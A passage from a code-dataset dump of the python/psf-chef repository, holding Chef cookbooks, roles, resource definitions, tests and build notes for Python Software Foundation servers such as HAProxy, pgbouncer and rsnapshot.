"text": "Steps to build this custom HAProxy package:\n\n1. sudo aptitude install build-essential libev-dev ruby1.9.1 ruby1.9.1-dev libpcre3-dev libssl-dev\n2. wget http://haproxy.1wt.eu/download/1.5/src/devel/haproxy-1.5-dev22.tar.gz\n3. tar -xvf haproxy-1.5-dev22.tar.gz\n4. cd haproxy-1.5-dev22\n5. sudo make all install TARGET=linux2628 PREFIX=/usr USE_PCRE=1 USE_STATIC_PCRE=1 USE_OPENSSL=1\n6. sudo gem install fpm\n7. fpm -s dir -t deb -n haproxy -v 1.5-dev22 -C / -d 'libssl1.0.0' -d 'libc6 >= 2.5' /usr/sbin/haproxy /usr/share/man/man1/haproxy.1 /usr/doc/haproxy\n"
},
{
"alpha_fraction": 0.6363458633422852,
"alphanum_fraction": 0.6426056623458862,
"avg_line_length": 28.54913330078125,
"blob_id": "c544cc744a9681137f4688ac58085e7ea1d4253a",
"content_id": "e67282871b3f97eafc3d7f06c4c458f727490f04",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 5112,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 173,
"path": "/cookbooks/user/providers/account.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "#\n# Cookbook Name:: user\n# Provider:: account\n#\n# Author:: Fletcher Nichol <[email protected]>\n#\n# Copyright 2011, Fletcher Nichol\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\ndef load_current_resource\n @my_home = new_resource.home ||\n \"#{node['user']['home_root']}/#{new_resource.username}\"\n @my_shell = new_resource.shell || node['user']['default_shell']\n @manage_home = bool(new_resource.manage_home, node['user']['manage_home'])\n @create_group = bool(new_resource.create_group, node['user']['create_group'])\n @ssh_keygen = bool(new_resource.ssh_keygen, node['user']['ssh_keygen'])\nend\n\naction :create do\n user_resource :create\n dir_resource :create\n authorized_keys_resource :create\n keygen_resource :create\nend\n\naction :remove do\n keygen_resource :delete\n authorized_keys_resource :delete\n dir_resource :delete\n user_resource :remove\nend\n\naction :modify do\n user_resource :modify\n dir_resource :create\n authorized_keys_resource :create\n keygen_resource :create\nend\n\naction :manage do\n user_resource :manage\n dir_resource :create\n authorized_keys_resource :create\n keygen_resource :create\nend\n\naction :lock do\n user_resource :lock\n dir_resource :create\n authorized_keys_resource :create\n keygen_resource :create\nend\n\naction :unlock do\n user_resource :unlock\n dir_resource :create\n authorized_keys_resource :create\n keygen_resource :create\nend\n\nprivate\n\ndef bool(resource_val, default_val)\n if resource_val.nil?\n normalize_bool(default_val)\n else\n normalize_bool(resource_val)\n end\nend\n\ndef normalize_bool(val)\n case val\n when 'no','false',false then false\n else true\n end\nend\n\ndef user_resource(exec_action)\n # avoid variable scoping issues in resource block\n my_home, my_shell, manage_home = @my_home, @my_shell, @manage_home\n\n r = user new_resource.username do\n comment new_resource.comment if new_resource.comment\n uid new_resource.uid if new_resource.uid\n gid new_resource.gid if new_resource.gid\n home my_home if my_home\n shell my_shell if my_shell\n password new_resource.password if new_resource.password\n system new_resource.system_user\n supports :manage_home => manage_home\n action :nothing\n end\n r.run_action(exec_action)\n new_resource.updated_by_last_action(true) if r.updated_by_last_action?\n\n # fixes CHEF-1699\n Etc.endgrent\nend\n\ndef dir_resource(exec_action)\n [\"#{@my_home}/.ssh\", @my_home].each do |dir|\n r = directory dir do\n owner new_resource.username\n group new_resource.gid if new_resource.gid\n mode dir =~ %r{/\\.ssh$} ? '0700' : '2755'\n recursive true\n action :nothing\n end\n r.run_action(exec_action)\n new_resource.updated_by_last_action(true) if r.updated_by_last_action?\n end\nend\n\ndef authorized_keys_resource(exec_action)\n # avoid variable scoping issues in resource block\n ssh_keys = Array(new_resource.ssh_keys)\n\n r = template \"#{@my_home}/.ssh/authorized_keys\" do\n cookbook 'user'\n source 'authorized_keys.erb'\n owner new_resource.username\n group new_resource.gid if new_resource.gid\n mode '0600'\n variables :user => new_resource.username,\n :ssh_keys => ssh_keys\n action :nothing\n end\n r.run_action(exec_action)\n new_resource.updated_by_last_action(true) if r.updated_by_last_action?\nend\n\ndef keygen_resource(exec_action)\n # avoid variable scoping issues in resource block\n fqdn, my_home = node['fqdn'], @my_home\n\n e = execute \"create ssh keypair for #{new_resource.username}\" do\n cwd my_home\n user new_resource.username\n command <<-KEYGEN.gsub(/^ +/, '')\n ssh-keygen -t dsa -f #{my_home}/.ssh/id_dsa -N '' \\\n -C '#{new_resource.username}@#{fqdn}-#{Time.now.strftime('%FT%T%z')}'\n chmod 0600 #{my_home}/.ssh/id_dsa\n chmod 0644 #{my_home}/.ssh/id_dsa.pub\n KEYGEN\n action :nothing\n\n creates \"#{my_home}/.ssh/id_dsa\"\n end\n e.run_action(:run) if @ssh_keygen && exec_action == :create\n new_resource.updated_by_last_action(true) if e.updated_by_last_action?\n\n if exec_action == :delete then\n [\"#{@my_home}/.ssh/id_dsa\", \"#{@my_home}/.ssh/id_dsa.pub\"].each do |keyfile|\n r = file keyfile do\n backup false\n action :delete\n end\n new_resource.updated_by_last_action(true) if r.updated_by_last_action?\n end\n end\nend\n"
},
{
"alpha_fraction": 0.757709264755249,
"alphanum_fraction": 0.7753304243087769,
"avg_line_length": 31.428571701049805,
"blob_id": "651d5382b2bd57cf865c43e4cdf96b0b6112b4fa",
"content_id": "9ef00633a4b8b32b2cdadd96ab538c87487f5b3f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 227,
"license_type": "no_license",
"max_line_length": 145,
"num_lines": 7,
"path": "/cookbooks/psf-pycon/Berksfile",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "site :opscode\n\nmetadata\ncookbook 'application_nginx', :git => 'https://github.com/coderanger/application_nginx.git' # Pending http://tickets.opscode.com/browse/COOK-3254\ncookbook 'apt'\ncookbook 'postgresql'\ncookbook 'database'\n"
},
{
"alpha_fraction": 0.7915831804275513,
"alphanum_fraction": 0.8116232752799988,
"avg_line_length": 34.64285659790039,
"blob_id": "4f9f41d1bcc7531ab55ca49295f651c00cc680f3",
"content_id": "6bb487c0a6f269e67dedda858441cd4a5e1cc1ba",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 499,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 14,
"path": "/cookbooks/psf-advocacy/README.md",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "aptitude install apache2\ncreate /etc/apache2/sites-available/advocacy\na2enmod rewrite\na2dissite 000-default\na2ensite advocacy\nmkdir /data/advocacy (was /data/www/advocacy)\nrsync -avz ximinez.python.org:/data/www/advocacy /data\napt-get install webalizer\nrsync -avz ximinez.python.org:/data/webstats/advocacy /data/webstats\ncreate /etc/webalizer/advocacy.conf\nmove logfiles to /var/log/apache2\nchange /etc/logrotate.d/apache2 to daily, four days\napt-get install munin\nln -s /var/cache/munin/www munin\n"
},
{
"alpha_fraction": 0.662756621837616,
"alphanum_fraction": 0.6686217188835144,
"avg_line_length": 39.117645263671875,
"blob_id": "c42d5f57beb045b358a3371fa555061c6eddb020",
"content_id": "3bf3511caea72db14a38fa7e63fc37379b5043f7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 682,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 17,
"path": "/cookbooks/pgbouncer/resources/database.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "attribute :name, :name_attribute => true\nattribute :dbname, :kind_of => [String, NilClass], :default => false # false used as a sentinel value\nattribute :host, :kind_of => String, :required => true\nattribute :port, :kind_of => [String, Integer], :default => 5432\nattribute :user, :kind_of => [String, NilClass]\nattribute :password, :kind_of => [String, NilClass]\n\ndef to_config\n config_line = []\n config_line << \"dbname=#{self.dbname || self.name}\" unless self.dbname.nil?\n config_line << \"host=#{self.host} port=#{self.port}\"\n if self.user\n config_line << \"user=#{self.user}\"\n config_line << \"password=#{self.password}\" if self.password\n end\n config_line.join(' ')\nend\n"
},
{
"alpha_fraction": 0.8181818127632141,
"alphanum_fraction": 0.8181818127632141,
"avg_line_length": 21,
"blob_id": "14bd8b43b99522f3dc60c27718dc51c88a92a0e9",
"content_id": "66a719dcf6f2510baff69f7036907a295aee02f1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 22,
"license_type": "no_license",
"max_line_length": 21,
"num_lines": 1,
"path": "/cookbooks/pgbouncer/recipes/default.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "pgbouncer 'pgbouncer'\n"
},
{
"alpha_fraction": 0.7291666865348816,
"alphanum_fraction": 0.7291666865348816,
"avg_line_length": 31,
"blob_id": "c076d1b2d6d33f073878d962589e5df97d06a40f",
"content_id": "0771464efaf0fdfa1b70066cd3bde2118ed50aaf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 96,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 3,
"path": "/roles/future-docs.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "name 'future-docs'\ndescription 'Sandbox to work on future docs system'\n# Owner Georg Brandl <[email protected]>\n"
},
{
"alpha_fraction": 0.6745561957359314,
"alphanum_fraction": 0.6745561957359314,
"avg_line_length": 27.16666603088379,
"blob_id": "ecc3d58f56845e92d74a5f167820bff56d50a02d",
"content_id": "4ba709e85dd05eb9550c4918b0ff77ef111e8e0d",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 338,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 12,
"path": "/cookbooks/user/test/providers/account_spec.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "require 'minitest/autorun'\nrequire File.expand_path(File.join(File.dirname(__FILE__), '../spec_helper'))\n\ndescribe 'Chef::Provider::UserAccount' do\n include ProviderMixins\n\n let(:cookbook) { :user }\n let(:lwrp) { :account }\n\n before { @it = load_provider(cookbook, lwrp).new }\n after { unload_provider(cookbook, lwrp) }\nend\n"
},
{
"alpha_fraction": 0.6691892147064209,
"alphanum_fraction": 0.6713513731956482,
"avg_line_length": 41.04545593261719,
"blob_id": "02e050cfa56e473643a9d9e48f56d862f8640c84",
"content_id": "f79a2dea37604a5b13c60a29df17ca7a4c22a586",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 925,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 22,
"path": "/cookbooks/psf-loadbalancer/recipes/haproxy.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "# sysctl \"net.ipv4.ip_nonlocal_bind\" do\n# value 1\n# end\n\ninclude_recipe 'haproxy'\n\nhaproxy_section 'python' do\n source 'haproxy.cfg.erb'\n variables({\n :pypi_servers => search(:node, 'roles:pypi AND tags:active'),\n :preview_pypi_servers => search(:node, 'roles:pypi AND tags:active'),\n :testpypi_servers => search(:node, 'roles:pypi AND tags:active'),\n :wiki_servers => search(:node, 'roles:wiki AND tags:active'),\n :pypy_home_servers => search(:node, 'roles:pypy-home AND tags:active'),\n :preview_servers => search(:node, 'roles:pydotorg-staging-web'),\n :pydotorg_servers => search(:node, 'roles:pydotorg-prod-web AND tags:active'),\n :raspberry_servers => search(:node, 'roles:rpi'),\n :evote_servers => search(:node, 'roles:evote'),\n :uspycon_servers => search(:node, 'roles:psf-pycon AND tags:production'),\n :uspycon_staging_servers => search(:node, 'roles:psf-pycon-staging'),\n })\nend\n"
},
{
"alpha_fraction": 0.652945339679718,
"alphanum_fraction": 0.6586231589317322,
"avg_line_length": 32.5476188659668,
"blob_id": "a6e09a54ef8df114c9f6b6e7ed2120f623b9f415",
"content_id": "576e4bfae8aea04dde6e929fd089225c00be0c3d",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 1409,
"license_type": "permissive",
"max_line_length": 88,
"num_lines": 42,
"path": "/cookbooks/user/attributes/default.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "#\n# Cookbook Name:: user\n# Attributes:: default\n#\n# Author:: Fletcher Nichol <[email protected]>\n#\n# Copyright 2011, Fletcher Nichol\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\ncase platform\nwhen 'debian','ubuntu','redhat','centos','amazon','scientific','fedora','freebsd','suse'\n default['user']['home_root'] = \"/home\"\n default['user']['default_shell'] = \"/bin/bash\"\nwhen 'openbsd'\n default['user']['home_root'] = \"/home\"\n default['user']['default_shell'] = \"/bin/ksh\"\nwhen 'mac_os_x', 'mac_os_x_server'\n default['user']['home_root'] = \"/Users\"\n default['user']['default_shell'] = \"/bin/bash\"\nelse\n default['user']['home_root'] = \"/home\"\n default['user']['default_shell'] = nil\nend\n\ndefault['user']['manage_home'] = \"true\"\ndefault['user']['create_user_group'] = \"true\"\ndefault['user']['ssh_keygen'] = \"true\"\n\ndefault['user']['data_bag'] = \"users\"\ndefault['user']['lockdown'] = false\n"
},
{
"alpha_fraction": 0.6242808103561401,
"alphanum_fraction": 0.6311852931976318,
"avg_line_length": 24.188405990600586,
"blob_id": "ceb5c3213affd1159ed648beb4a6f6b3e4bb65f2",
"content_id": "2a5cd78ac55bccc6b665162f4c95277e09ed2ffa",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 1738,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 69,
"path": "/cookbooks/user/test/resources/account_spec.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "require 'minitest/autorun'\nrequire File.expand_path(File.join(File.dirname(__FILE__), '../spec_helper'))\n\ndescribe 'Chef::Resource::UserAccount' do\n include ResourceMixins\n\n let(:cookbook) { :user }\n let(:lwrp) { :account }\n\n before { @it = load_resource(cookbook, lwrp).new(\"fuzzybear\") }\n after { unload_resource(cookbook, lwrp) }\n\n it \"sets the name attribute to username attr\" do\n @it.username.must_equal \"fuzzybear\"\n end\n\n %w{uid gid}.each do |attr|\n it \"takes a String value for #{attr} attr\" do\n @it.send(attr, \"666\")\n @it.send(attr).must_equal \"666\"\n end\n\n it \"takes an Integer value for #{attr} attr\" do\n @it.send(attr, 777)\n @it.send(attr).must_equal 777\n end\n end\n\n %w{comment home shell password}.each do |attr|\n it \"takes a String value for #{attr} attr\" do\n @it.send(attr, \"goop\")\n @it.send(attr).must_equal \"goop\"\n end\n end\n\n it \"takes a Boolean value for system_user attr\" do\n @it.system_user true\n @it.system_user.must_equal true\n end\n\n it \"defaults to false for system_user attr\" do\n @it.system_user.must_equal false\n end\n\n %w{manage_home create_group ssh_keygen}.each do |attr|\n it \"takes a truthy value for #{attr} attr\" do\n @it.send(attr, true)\n @it.send(attr).must_equal true\n end\n\n it \"defaults to nil for #{attr} attr\" do\n @it.send(attr).must_be_nil\n end\n end\n\n it \"takes a String value for ssh_keys attr\" do\n @it.ssh_keys \"mykey\"\n @it.ssh_keys.must_equal \"mykey\"\n end\n\n it \"takes an Array value for ssh_keys attr\" do\n @it.ssh_keys [\"a\", \"b\"]\n @it.ssh_keys.must_equal [\"a\", \"b\"]\n end\n\n it \"defaults to an empty Array for ssh_keys attr\" do\n @it.ssh_keys.must_equal []\n end\nend\n"
},
{
"alpha_fraction": 0.4974619150161743,
"alphanum_fraction": 0.510152280330658,
"avg_line_length": 17.761905670166016,
"blob_id": "ba2a05de3e6278bddc0f4f160b59e62c781dbbd1",
"content_id": "913d2c93440f86aa50350b33a382c73e23d92c75",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 394,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 21,
"path": "/roles/rsnapshot.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "name \"rsnapshot\"\ndescription \"RSnapshot backup server\"\n# Owner: Noah Kantrowitz <[email protected]>\n\nrun_list 'recipe[psf-postgresql::92]','recipe[rsnapshot::server]', 'recipe[psf-rsnapshot::postgres]'\n\noverride_attributes({\n rsnapshot: {\n server: {\n retain: {\n hourly: {\n count: 4,\n hour: '*/6',\n },\n daily: {\n count: 7,\n }\n },\n },\n },\n})\n"
},
{
"alpha_fraction": 0.6964285969734192,
"alphanum_fraction": 0.6964285969734192,
"avg_line_length": 17.66666603088379,
"blob_id": "3e86e526662a638e2e16f484d618ed3269b610b5",
"content_id": "bcb430f5c554605dfa3f77c853532227a896b54e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 112,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 6,
"path": "/roles/psf-pycon.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "name \"psf-pycon\"\ndescription \"Production Pycon website\"\n# Owner: Diana Clark\nrun_list [\n \"recipe[psf-pycon::app]\"\n]\n"
},
{
"alpha_fraction": 0.7116564512252808,
"alphanum_fraction": 0.7116564512252808,
"avg_line_length": 31.399999618530273,
"blob_id": "4e8dba66160760a7f1b5d53365085c49c8386655",
"content_id": "c604a10cb395ce5f64a2e0c7dfe9beb939ec6303",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 163,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 5,
"path": "/cookbooks/rsnapshot/resources/client.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "default_action :install\nactions :remove\n\nattribute :name, :kind_of => String, :name_attribute => true\nattribute :server_role, :kind_of => String, :default => nil\n\n"
},
{
"alpha_fraction": 0.6909250617027283,
"alphanum_fraction": 0.6909250617027283,
"avg_line_length": 56.025001525878906,
"blob_id": "8af3747d888f6c44614d01384df03517b9127262",
"content_id": "4d949f485c44ec94a19030ff0e2a366a8edf5a6a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 2281,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 40,
"path": "/cookbooks/rsnapshot/recipes/server.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "rsnapshot_server 'rsnapshot' do\n dir node['rsnapshot']['server']['dir']\n config_version node['rsnapshot']['server']['config_version']\n snapshot_root node['rsnapshot']['server']['snapshot_root']\n no_create_root node['rsnapshot']['server']['no_create_root']\n cmd_cp node['rsnapshot']['server']['cmd_cp']\n cmd_rm node['rsnapshot']['server']['cmd_rm']\n cmd_rsync node['rsnapshot']['server']['cmd_rsync']\n cmd_ssh node['rsnapshot']['server']['cmd_ssh']\n cmd_logger node['rsnapshot']['server']['cmd_logger']\n cmd_du node['rsnapshot']['server']['cmd_du']\n cmd_rsnapshot_diff node['rsnapshot']['server']['cmd_rsnapshot_diff']\n cmd_preexec node['rsnapshot']['server']['cmd_preexec']\n cmd_postexec node['rsnapshot']['server']['cmd_postexec']\n linux_lvm_cmd_lvcreate node['rsnapshot']['server']['linux_lvm_cmd_lvcreate']\n linux_lvm_cmd_lvremove node['rsnapshot']['server']['linux_lvm_cmd_lvremove']\n linux_lvm_cmd_mount node['rsnapshot']['server']['linux_lvm_cmd_mount']\n linux_lvm_cmd_umount node['rsnapshot']['server']['linux_lvm_cmd_umount']\n verbose node['rsnapshot']['server']['verbose']\n loglevel node['rsnapshot']['server']['loglevel']\n logfile node['rsnapshot']['server']['logfile']\n lockfile node['rsnapshot']['server']['lockfile']\n stop_on_stale_lockfile node['rsnapshot']['server']['stop_on_stale_lockfile']\n rsync_short_args node['rsnapshot']['server']['rsync_short_args']\n rsync_long_args node['rsnapshot']['server']['rsync_long_args']\n ssh_args node['rsnapshot']['server']['ssh_args']\n du_args node['rsnapshot']['server']['du_args']\n one_fs node['rsnapshot']['server']['one_fs']\n link_dest node['rsnapshot']['server']['link_dest']\n sync_first node['rsnapshot']['server']['sync_first']\n use_lazy_deletes node['rsnapshot']['server']['use_lazy_deletes']\n rsync_numtries node['rsnapshot']['server']['rsync_numtries']\n linux_lvm_snapshotsize node['rsnapshot']['server']['linux_lvm_snapshotsize']\n linux_lvm_snapshotname node['rsnapshot']['server']['linux_lvm_snapshotname']\n linux_lvm_vgpath node['rsnapshot']['server']['linux_lvm_vgpath']\n linux_lvm_mountpath node['rsnapshot']['server']['linux_lvm_mountpath']\n node['rsnapshot']['server']['retain'].each do |retain_name, retain_data|\n retain retain_name, retain_data if retain_data\n end\nend\n"
},
{
"alpha_fraction": 0.6478873491287231,
"alphanum_fraction": 0.6478873491287231,
"avg_line_length": 18,
"blob_id": "5663793ce4523d443c7aabebc0384bbddf6dc6ee",
"content_id": "a39498b009db3b81ec4db06b1abd741a869c50f5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 1349,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 71,
"path": "/doc/generating-these-docs.rst",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "Generating these docs\n======================\n\nThe goal of this document is to outline how to generate these documents and\nwhere they land.\n\nBy the end of this you should have a full copy of this documentation.\n\nPrerequisites\n-------------\n\nYou'll need the python `sphinx` package.\n\nYour distribution may have a package for this, but you may also be able to\ninstall it with python package tools like so:\n\n::\n\n $ pip install sphinx\n\nOr with `easy_install`:\n\n::\n\n $ easy_install sphinx\n\n\nCheckout the docs branch\n------------------------\n\n::\n\n $ git checkout docs\n\nGenerate a local copy of the docs\n----------------------------------\n\nThis will generate html from our documentation, and place it in\n`./doc/_build/html`\n\n::\n\n $ bundle exec rake docs\n\nGenerate a single module of the documentation\n----------------------------------------------\n\nSay you want to generate only the node documentation\n\n::\n\n $ bundle exec rake docs:nodes\n\nOr maybe you want to generate only the html\n\n::\n\n $ bundle exec rake docs:html\n\nManually publish this documentation\n------------------------------------\n\nTypically our documentation should be automatically generated. Just in case\nyou want to publish it manually, you can do this.\n\n::\n\n $ bundle exec rake docs:publish\n\nThis will tell readthedocs.org to clone the tip of this repo on github\nand build it.\n"
},
{
"alpha_fraction": 0.7168674468994141,
"alphanum_fraction": 0.7168674468994141,
"avg_line_length": 23.592592239379883,
"blob_id": "314c29fe2089bc8248ec695fa0c5677b60dd0116",
"content_id": "6583539a7cb07e3267c7c4947b8e15124789f19d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 664,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 27,
"path": "/cookbooks/psf-pypi/recipes/pgbouncer.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "include_recipe 'pgbouncer'\n\ndatabase = data_bag_item('secrets', 'postgres')\n\ndirectory '/var/run/postgresql' do\n owner 'pgbouncer'\nend\n\npgbouncer_database database['pypi']['database'] do\n host database['pypi']['hostname']\n user database['pypi']['user']\n password database['pypi']['password']\nend\n\npgbouncer_user database['pypi']['user'] do\n password database['pypi']['password']\nend\n\npgbouncer_database database['testpypi']['database'] do\n host database['testpypi']['hostname']\n user database['testpypi']['user']\n password database['testpypi']['password']\nend\n\npgbouncer_user database['testpypi']['user'] do\n password database['testpypi']['password']\nend\n"
},
{
"alpha_fraction": 0.6678071618080139,
"alphanum_fraction": 0.6721617579460144,
"avg_line_length": 53.49152374267578,
"blob_id": "c6689f45616f22ad3fd54a0b5cdc801a9c0b8aa8",
"content_id": "dacacd143f603723b4659d9879ecaa341174c0ff",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 3215,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 59,
"path": "/cookbooks/rsnapshot/resources/server.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "default_action :install\nactions :remove\n\nattribute :name, :kind_of => String, :name_attribute => true\nattribute :dir, :kind_of => String, :default => '/etc'\n\nattribute :config_version, :kind_of => String, :default => '1.2'\nattribute :snapshot_root, :kind_of => String, :default => '/var/cache/rsnapshot'\nattribute :no_create_root, :kind_of => [TrueClass, FalseClass], :default => false\n\nattribute :cmd_cp, :kind_of => [String, NilClass], :default => '/bin/cp'\nattribute :cmd_rm, :kind_of => [String, NilClass], :default => '/bin/rm'\nattribute :cmd_rsync, :kind_of => [String, NilClass], :default => '/usr/bin/rsync'\nattribute :cmd_ssh, :kind_of => [String, NilClass], :default => '/usr/bin/ssh'\nattribute :cmd_logger, :kind_of => [String, NilClass], :default => '/usr/bin/logger'\nattribute :cmd_du, :kind_of => [String, NilClass], :default => '/usr/bin/du'\nattribute :cmd_rsnapshot_diff, :kind_of => [String, NilClass], :default => '/usr/bin/rsnapshot-diff'\nattribute :cmd_preexec, :kind_of => [String, NilClass], :default => nil\nattribute :cmd_postexec, :kind_of => [String, NilClass], :default => nil\n\nattribute :linux_lvm_cmd_lvcreate, :kind_of => [String, NilClass], :default => nil\nattribute :linux_lvm_cmd_lvremove, :kind_of => [String, NilClass], :default => nil\nattribute :linux_lvm_cmd_mount, :kind_of => [String, NilClass], :default => nil\nattribute :linux_lvm_cmd_umount, :kind_of => [String, NilClass], :default => nil\n\nattribute :_retain, :kind_of => Array, :default => []\ndef retain(name=nil, values=nil, &block)\n if name\n ret = RsnapshotRetain.new(name)\n if values\n values.each do |key, value|\n ret.send(key, value)\n end\n end\n ret.instance_eval(&block) if block\n self._retain << ret\n else\n self._retain\n end\nend\n\nattribute :verbose, :equal_to => [1, 2, 3, 4, 5], :default => 2\nattribute :loglevel, :equal_to => [1, 2, 3, 4, 5], :default => 3\nattribute :logfile, :kind_of => [String, NilClass], :default => nil\nattribute :lockfile, :kind_of => String, :default => '/var/run/rsnapshot.pid'\nattribute :stop_on_stale_lockfile, :kind_of => [TrueClass, FalseClass], :default => true\nattribute :rsync_short_args, :kind_of => String, :default => '-a'\nattribute :rsync_long_args, :kind_of => String, :default => '--delete --numeric-ids --relative --delete-excluded'\nattribute :ssh_args, :kind_of => [String, NilClass], :default => '-i /root/.ssh/id_rsnapshot -o StrictHostKeyChecking=no'\nattribute :du_args, :kind_of => [String, NilClass], :default => '-csh'\nattribute :one_fs, :kind_of => [TrueClass, FalseClass], :default => false\nattribute :link_dest, :kind_of => [TrueClass, FalseClass], :default => false\nattribute :sync_first, :kind_of => [TrueClass, FalseClass], :default => false\nattribute :use_lazy_deletes, :kind_of => [TrueClass, FalseClass], :default => false\nattribute :rsync_numtries, :kind_of => [Integer, NilClass], :default => nil\nattribute :linux_lvm_snapshotsize, :kind_of => [String, NilClass], :default => nil\nattribute :linux_lvm_snapshotname, :kind_of => [String, NilClass], :default => nil\nattribute :linux_lvm_vgpath, :kind_of => [String, NilClass], :default => nil\nattribute :linux_lvm_mountpath, :kind_of => [String, NilClass], :default => nil\n"
},
{
"alpha_fraction": 0.6705202460289001,
"alphanum_fraction": 0.7225433588027954,
"avg_line_length": 20.5,
"blob_id": "f7e76f7c4125d83ddb20b3521982c6f35bcfd44c",
"content_id": "6c7dfa2b1ee74853b23f6a78e9cc01c0fd8a3bd0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 173,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 8,
"path": "/cookbooks/psf-loadbalancer/recipes/heartbeat.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "\ninclude_recipe \"heartbeat\"\n\nsecrets = data_bag_item('secrets', 'heartbeat')\n\nheartbeat \"psf-loadbalancer\" do\n authkeys secrets['secrets'][0]\n resources \"140.211.10.69\"\nend\n"
},
{
"alpha_fraction": 0.720678985118866,
"alphanum_fraction": 0.720678985118866,
"avg_line_length": 42.20000076293945,
"blob_id": "dcdcc33f9a516e1cc12271c9b782f09c72e9f027",
"content_id": "8a4e7146ae97857b6a47f6d9a750f942cbe1653a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 648,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 15,
"path": "/cookbooks/haproxy/resources/section.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "default_action :install\nactions :remove\n\nattribute :name, :name_attribute => true\nattribute :haproxy, :kind_of => String, :default => 'haproxy'\nattribute :source, :kind_of => String, :required => true\nattribute :cookbook, :kind_of => [String, NilClass]\nattribute :variables, :kind_of => Hash, :default => {}\n\ndef haproxy_resource\n @haproxy_resource ||= resources(\"haproxy[#{self.haproxy}]\")\nrescue Chef::Exceptions::ResourceNotFound\n known_resources = run_context.resource_collection.select {|res| res.is_a? Chef::Resource::Haproxy}\n raise \"Unknown HAProxy parent #{self.haproxy.inspect}. Did you mean one of: #{known_resources.join(', ')}\"\nend\n"
},
{
"alpha_fraction": 0.7066666483879089,
"alphanum_fraction": 0.7066666483879089,
"avg_line_length": 31.14285659790039,
"blob_id": "a755f149c849a0e58bbc48eac460401667f4d5d8",
